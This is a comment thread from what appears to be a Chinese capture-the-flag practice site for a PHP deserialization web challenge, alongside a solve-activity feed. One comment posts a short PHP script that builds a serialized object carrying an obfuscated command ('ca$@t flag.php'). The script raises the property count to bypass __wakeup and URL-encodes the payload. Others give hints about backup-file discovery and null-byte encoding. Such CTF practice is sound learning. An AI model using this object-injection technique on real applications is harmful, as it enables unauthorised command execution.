评分(3)
解题动态
YameMres 攻破了该题 5小时前
zttyzz 攻破了该题 3天前
zwhnsh 攻破了该题 4天前
20220406402021 攻破了该题 5天前
fujialong 攻破了该题 5天前
17666664717 攻破了该题 5天前
sudden 攻破了该题 5天前
mmmiao 攻破了该题 6天前
19868806758 攻破了该题 6天前
18185185996 攻破了该题 9天前
lihaojie123 攻破了该题 9天前
x1997 攻破了该题 10天前
17330361658 攻破了该题 10天前
积极又努力的小冀同学 攻破了该题 10天前
675838709 攻破了该题 10天前
ifnoif 攻破了该题 11天前
fyhfyh 攻破了该题 11天前
folinic 攻破了该题 11天前
654272406 攻破了该题 11天前
评论
yuanyipaceandlove 1年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 2年前
举报
特别要注意下url编码的问题
泡椒控卫 2年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
追风亚索 2年前
举报
flag{Unser1alize_and_2CE_Add},flag是不是没变
笨笨笨蛋 2年前
举报
只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~
YLMB001 2年前
举报
为什么我序列化后的protected属性是带有%20*%20而不是%00*%00
lysandria 2年前
举报
注意protect属性。
xiaoxiao972521 2年前
举报
认输,查到backups后,哪哪没消息了。。。鬼知道起名index.php.bak,人与人的想法不一样。。index.php_bak_20220430
SiiiirR0 2年前
举报
万能的dirsearch
落日星辰 2年前
举报
分享:https://blog.csdn.net/zzldm/article/details/112004122
sunny 2年前
举报
学到了学到了